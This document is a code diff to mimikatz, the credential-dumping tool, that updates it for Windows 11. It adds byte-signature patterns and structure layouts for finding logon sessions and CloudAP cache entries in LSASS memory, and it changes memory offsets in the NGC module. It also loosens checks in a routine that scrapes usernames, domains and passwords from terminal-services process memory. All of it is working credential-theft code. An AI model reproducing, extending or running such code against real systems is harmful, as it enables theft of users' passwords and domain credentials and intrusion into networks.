diff --git a/inc/globals.h b/inc/globals.h index ea877781..44cace68 100644 --- a/inc/globals.h +++ b/inc/globals.h @@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU #define KULL_M_WIN_MIN_BUILD_7 7000 #define KULL_M_WIN_MIN_BUILD_8 8000 #define KULL_M_WIN_MIN_BUILD_BLUE 9400 -#define KULL_M_WIN_MIN_BUILD_10 9800 \ No newline at end of file +#define KULL_M_WIN_MIN_BUILD_10 9800 +#define KULL_M_WIN_MIN_BUILD_11 22000 \ No newline at end of file diff --git a/mimikatz/modules/kuhl_m_ts.c b/mimikatz/modules/kuhl_m_ts.c index d0b94745..b67722d7 100644 --- a/mimikatz/modules/kuhl_m_ts.c +++ b/mimikatz/modules/kuhl_m_ts.c @@ -272,14 +272,13 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION { pWebKiwiData = (PWTS_WEB_KIWI) CurrentPtr; if( - (pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000)) + (pWebKiwiData->Username.Buffer && !((ULONG_PTR) pWebKiwiData->Username.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Username.Buffer < 0x1000)) && (pWebKiwiData->Username.Length && !(pWebKiwiData->Username.Length % sizeof(wchar_t)) && (pWebKiwiData->Username.Length < ((WTS_USERNAME_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Username.Length == pWebKiwiData->Username.MaximumLength) || (pWebKiwiData->Username.Length == (pWebKiwiData->Username.MaximumLength - sizeof(wchar_t))))) ) { - if( - (pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000)) + (pWebKiwiData->Password.Buffer && !((ULONG_PTR) pWebKiwiData->Password.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Password.Buffer < 0x1000)) && (pWebKiwiData->Password.Length && !(pWebKiwiData->Password.Length % sizeof(wchar_t)) && (pWebKiwiData->Password.Length < ((WTS_PASSWORD_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Password.Length == pWebKiwiData->Password.MaximumLength) || (pWebKiwiData->Password.Length == (pWebKiwiData->Password.MaximumLength - sizeof(wchar_t))))) ) @@ -289,7 +288,7 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION ref = (PBYTE) aProcess.address + (CurrentPtr - (PBYTE) aLocalBuffer.address); if( - (pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % sizeof(PVOID)) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000)) + (pWebKiwiData->Domain.Buffer && !((ULONG_PTR) pWebKiwiData->Domain.Buffer % 2) && ((ULONG_PTR) pWebKiwiData->Domain.Buffer < 0x1000)) && (pWebKiwiData->Domain.Length && !(pWebKiwiData->Domain.Length % sizeof(wchar_t)) && (pWebKiwiData->Domain.Length < ((WTS_DOMAIN_LENGTH + 1) * sizeof(wchar_t))) && ((pWebKiwiData->Domain.Length == pWebKiwiData->Domain.MaximumLength) || (pWebKiwiData->Domain.Length == (pWebKiwiData->Domain.MaximumLength - sizeof(wchar_t))))) ) diff --git a/mimikatz/modules/ngc/kuhl_m_ngc.c b/mimikatz/modules/ngc/kuhl_m_ngc.c index a62eac93..0445f1d5 100644 --- a/mimikatz/modules/ngc/kuhl_m_ngc.c +++ b/mimikatz/modules/ngc/kuhl_m_ngc.c @@ -188,7 +188,7 @@ NTSTATUS kuhl_m_ngc_logondata(int argc, wchar_t * argv[]) { if(kull_m_process_getVeryBasicModuleInformationsForName(aRemote.hMemory, L"NgcCtnrSvc.dll", &iModule)) { - aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*/0xbef10; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near + aRemote.address = (PBYTE) iModule.DllBase.address + /*0xB4F90;//*0xbef10*/0xA7E60; // ContainerManager -- InternalUninitializeService@@YAXXZ proc near if(kull_m_memory_copy(&aLocalBuffer, &aRemote, sizeof(containerManager))) { aRemote.address = containerManager.unk7; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c index 536424e7..34d4b794 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c @@ -18,6 +18,7 @@ BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0 BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; BYTE PTRN_WN1703_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x37, 0x48, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; BYTE PTRN_WN1803_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc9, 0x74}; +BYTE PTRN_WN11_LogonSessionList[] = {0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xff, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74}; KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}}, {KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}}, @@ -29,6 +30,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = { {KULL_M_WIN_BUILD_10_1703, {sizeof(PTRN_WN1703_LogonSessionList), PTRN_WN1703_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN1803_LogonSessionList), PTRN_WN1803_LogonSessionList}, {0, NULL}, {23, -4}}, {KULL_M_WIN_BUILD_10_1903, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {23, -4}}, + {KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_LogonSessionList), PTRN_WN11_LogonSessionList}, {0, NULL}, {24, -4}}, }; #elif defined(_M_IX86) BYTE PTRN_WN51_LogonSessionList[] = {0xff, 0x50, 0x10, 0x85, 0xc0, 0x0f, 0x84}; diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c index b0d99cad..023e8163 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.c @@ -7,8 +7,10 @@ #if defined(_M_X64) BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x44, 0x8b, 0x01, 0x44, 0x39, 0x42, 0x18, 0x75}; +BYTE PTRN_WN11_CloudApLocateLogonSession[] = {0x48, 0x8b, 0xd1, 0x49, 0x3b, 0xc1, 0x75}; KULL_M_PATCH_GENERIC CloudApReferences[] = { {KULL_M_WIN_BUILD_10_1909, {sizeof(PTRN_WALL_CloudApLocateLogonSession), PTRN_WALL_CloudApLocateLogonSession}, {0, NULL}, {-9}}, + {KULL_M_WIN_MIN_BUILD_11, {sizeof(PTRN_WN11_CloudApLocateLogonSession), PTRN_WN11_CloudApLocateLogonSession}, {0, NULL}, {-4}}, }; #elif defined(_M_IX86) BYTE PTRN_WALL_CloudApLocateLogonSession[] = {0x8b, 0x31, 0x39, 0x72, 0x10, 0x75}; diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h index 660a230e..7b20f46b 100644 --- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h +++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_cloudap.h @@ -75,4 +75,19 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY { DWORD64 unk3; PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; // ... -} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY; \ No newline at end of file +} KIWI_CLOUDAP_LOGON_LIST_ENTRY, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY; + +typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 { + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Flink; + struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY *Blink; + DWORD unk0; + DWORD unk1; + DWORD unk2; + LUID LocallyUniqueIdentifier; + DWORD unk3; + DWORD unk4; + DWORD unk5; + DWORD unk6; + PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry; + // ... +} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11; \ No newline at end of file diff --git a/modules/kull_m_memory.c b/modules/kull_m_memory.c index fcb7eb91..3451f0bf 100644 --- a/modules/kull_m_memory.c +++ b/modules/kull_m_memory.c @@ -230,6 +230,7 @@ BOOL kull_m_memory_alloc(IN PKULL_M_MEMORY_ADDRESS Address, IN SIZE_T Lenght, IN kull_m_kernel_ioctl_handle(Address->hMemory->pHandleDriver->hDriver, IOCTL_MIMIDRV_VM_ALLOC, NULL, (DWORD) Lenght, &ptrAddress, &lenPtr, FALSE); break; default: + SetLastError(ERROR_NOT_SUPPORTED); break; } return (Address->address) != NULL;